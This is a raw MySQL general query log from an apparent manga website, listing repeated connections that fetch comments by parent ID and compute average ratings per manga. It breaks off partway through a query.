330645606 Query select * FROM comments where parent_id = '1303' 330645606 Quit 330645607 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645607 Query select * FROM comments where parent_id = '1209' 330645607 Quit 330645608 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645608 Query select * FROM comments where parent_id = '1208' 330645608 Quit 330645609 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645609 Query select * FROM comments where parent_id = '962' 330645609 Quit 330645610 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645610 Query select * FROM comments where parent_id = '959' 330645610 Quit 330645611 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645611 Query select * FROM comments where parent_id = '896' 330645611 Quit 330645612 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645612 Query select * FROM comments where parent_id = '895' 330645612 Quit 330645613 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645613 Query select * FROM comments where parent_id = '851' 330645613 Quit 330645614 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645614 Query select * FROM comments where parent_id = '844' 330645614 Quit 330645615 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645615 Query select * FROM comments where parent_id = '809' 330645615 Quit 330645616 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645616 Query select * FROM comments where parent_id = '800' 330645616 Quit 330645617 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645617 Query select * FROM comments where parent_id = '779' 330645617 Quit 330645618 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645618 Query select * FROM comments where parent_id = '777' 330645618 Quit 330645619 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645619 Query select * FROM comments where parent_id = '743' 330645619 Quit 330645620 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645620 Query select * FROM comments where parent_id = '742' 330645620 Quit 330645621 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645621 Query select * FROM comments where parent_id = '735' 330645621 Quit 330645622 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645622 Query select * FROM comments where parent_id = '730' 330645622 Quit 330645623 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645623 Query select * FROM comments where parent_id = '728' 330645623 Quit 330645624 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645624 Query select * FROM comments where parent_id = '727' 330645624 Quit 330645625 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645625 Query select * FROM comments where parent_id = '725' 330645625 Quit 330645626 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645626 Query select * FROM comments where parent_id = '721' 330645626 Quit 330645627 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645627 Query select * FROM comments where parent_id = '719' 330645627 Quit 330645628 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645628 Query select * FROM comments where parent_id = '720' 330645628 Quit 330645629 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645629 Query select * FROM comments where parent_id = '717' 330645629 Quit 330645630 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645630 Query select * FROM comments where parent_id = '718' 330645630 Quit 330645631 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645631 Query select * FROM comments where parent_id = '715' 330645631 Quit 330645632 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645632 Query select * FROM comments where parent_id = '703' 330645632 Quit 330645633 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645633 Query select * FROM comments where parent_id = '702' 330645633 Quit 330645634 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645634 Query select * FROM comments where parent_id = '696' 330645634 Quit 330645635 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645635 Query select * FROM comments where parent_id = '694' 330645635 Quit 330645636 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645636 Query select * FROM comments where parent_id = '689' 330645636 Quit 330645637 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645637 Query select * FROM comments where parent_id = '687' 330645637 Quit 330645638 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645638 Query select * FROM comments where parent_id = '683' 330645638 Quit 330645639 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645639 Query select * FROM comments where parent_id = '672' 330645639 Quit 330645640 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645640 Query select * FROM comments where parent_id = '660' 330645640 Quit 330645641 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645641 Query select * FROM comments where parent_id = '659' 330645641 Quit 330645642 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645642 Query select * FROM comments where parent_id = '657' 330645642 Quit 330645643 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645643 Query select * FROM comments where parent_id = '656' 330645643 Quit 330645644 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645644 Query select * FROM comments where parent_id = '87' 330645644 Quit 330645645 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645645 Query select * FROM comments where parent_id = '81' 330645645 Quit 330645646 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645646 Query select * FROM comments where parent_id = '77' 330645646 Quit 330645647 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645647 Query select * FROM comments where parent_id = '22' 330645647 Quit 330645648 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645648 Query select * FROM comments where parent_id = '21' 330645648 Quit 330645649 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645649 Query select * FROM comments where parent_id = '12' 330645649 Quit 330645650 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645650 Query select * FROM comments where parent_id = '11' 330645650 Quit 330645651 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645651 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330645651 Quit 330645652 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645652 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330645652 Quit 330645653 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645653 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '136' order by created desc 330645653 Quit 330645654 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645654 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330645654 Quit 330645655 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645655 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330645655 Quit 330645656 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645656 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330645656 Quit 330645657 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645657 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '141' order by created desc 330645657 Quit 330645658 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645658 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330645658 Quit 330645659 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645659 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330645659 Quit 330645660 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645660 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330645660 Quit 330645661 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645661 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330645661 Quit 330645662 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645662 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '96' order by created desc 330645662 Quit 330645663 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645663 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330645663 Quit 330645664 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645664 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '157' order by created desc 330645664 Quit 330645665 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645665 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330645665 Quit 330645666 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645666 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330645666 Quit 330645667 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645667 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330645667 Quit 330645668 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645668 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '137' order by created desc 330645668 Quit 330645669 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645669 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330645669 Quit 330645670 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645670 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330645670 Quit 330645671 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645671 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330645671 Quit 330645672 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645672 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '150' order by created desc 330645672 Quit 330645673 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645673 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330645673 Quit 330645674 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645674 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330645674 Quit 330645675 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645675 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '25' order by created desc 330645675 Quit 330645676 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645676 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '149' order by created desc 330645676 Quit 330645677 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645677 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '135' order by created desc 330645677 Quit 330645678 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645678 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330645678 Quit 330645679 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645679 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330645679 Quit 330645680 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645680 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '163' order by created desc 330645680 Quit 330645681 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645681 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330645681 Quit 330645682 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645682 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330645682 Quit 330645683 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645683 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330645683 Quit 330645684 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645684 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330645684 Quit 330645685 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645685 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '131' order by created desc 330645685 Quit 330645686 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645686 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330645686 Quit 330645687 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645687 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330645687 Quit 330645688 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645688 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '158' order by created desc 330645688 Quit 330645689 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645689 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '152' order by created desc 330645689 Quit 330645690 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645690 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '166' order by created desc 330645690 Quit 330645691 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645691 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330645691 Quit 330645692 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645692 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330645692 Quit 330645693 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645693 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '61' order by created desc 330645693 Quit 330645694 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645694 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '132' order by created desc 330645694 Quit 330645695 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645695 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '160' order by created desc 330645695 Quit 330645696 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645696 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330645696 Quit 330645697 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645697 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330645697 Quit 330645698 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645698 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '142' order by created desc 330645698 Quit 330645699 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645699 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '140' order by created desc 330645699 Quit 330645700 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645700 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330645700 Quit 330645701 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645701 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330645701 Quit 330645702 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645702 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '169' order by created desc 330645702 Quit 330645703 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645703 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '55' order by created desc 330645703 Quit 330645704 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645704 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '133' order by created desc 330645704 Quit 330645705 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645705 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330645705 Quit 330645706 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645706 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '95' order by created desc 330645706 Quit 330645707 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645707 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330645707 Quit 330645708 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645708 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330645708 Quit 330645709 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645709 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330645709 Quit 330645710 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645710 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330645710 Quit 330645711 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645711 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '151' order by created desc 330645711 Quit 330645712 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645712 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330645712 Quit 330645713 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645713 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '146' order by created desc 330645713 Quit 330645714 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645714 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '170' order by created desc 330645714 Quit 330645715 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645715 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '138' order by created desc 330645715 Quit 330645716 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645716 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330645716 Quit 330645717 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645717 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '159' order by created desc 330645717 Quit 330645718 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645718 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330645718 Quit 330645719 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645719 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330645719 Quit 330645720 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645720 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330645720 Quit 330645721 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645721 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330645721 Quit 330645722 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645722 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330645722 Quit 330645723 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645723 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330645723 Quit 330645724 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645724 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330645724 Quit 330645725 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645725 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '155' order by created desc 330645725 Quit 330645726 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645726 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330645726 Quit 330645727 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645727 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330645727 Quit 330645728 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645728 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330645728 Quit 330645729 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645729 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '167' order by created desc 330645729 Quit 330645730 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645730 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '145' order by created desc 330645730 Quit 330645731 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645731 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '69' order by created desc 330645731 Quit 330645732 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645732 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '144' order by created desc 330645732 Quit 330645733 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645733 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '165' order by created desc 330645733 Quit 330645734 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645734 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '148' order by created desc 330645734 Quit 330645735 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645735 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '154' order by created desc 330645735 Quit 330645736 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645736 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330645736 Quit 330645737 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645737 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330645737 Quit 330645738 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645738 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330645738 Quit 330645739 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645739 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330645739 Quit 330645740 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645740 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330645740 Quit 330645741 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645741 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330645741 Quit 330645742 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645742 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '56' order by created desc 330645742 Quit 330645743 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645743 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330645743 Quit 330645744 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645744 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330645744 Quit 330645745 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645745 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330645745 Quit 330645746 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645746 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330645746 Quit 330645747 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645747 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330645747 Quit 330645748 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645748 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330645748 Quit 330645749 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645749 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '164' order by created desc 330645749 Quit 330645750 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645750 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330645750 Quit 330645751 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645751 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330645751 Quit 330645752 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645752 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330645752 Quit 330645753 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645753 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330645753 Quit 330645754 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645754 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '79' order by created desc 330645754 Quit 330645755 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645755 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330645755 Quit 330645756 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645756 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330645756 Quit 330645757 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645757 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330645757 Quit 330645758 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645758 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '134' order by created desc 330645758 Quit 330645759 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645759 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330645759 Quit 330645760 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645760 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330645760 Quit 330645761 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645761 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '162' order by created desc 330645761 Quit 330645762 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645762 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330645762 Quit 330645763 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645763 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330645763 Quit 330645764 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645764 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330645764 Quit 330645765 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645765 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330645765 Quit 330645766 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645766 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '139' order by created desc 330645766 Quit 330645767 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645767 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330645767 Quit 330645768 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645768 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '161' order by created desc 330645768 Quit 330645769 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645769 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330645769 Quit 330645770 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645770 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330645770 Quit 330645771 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645771 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330645771 Quit 330645772 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645772 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330645772 Quit 330645773 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645773 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330645773 Quit 330645774 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645774 Query select count(id) as total_rating, 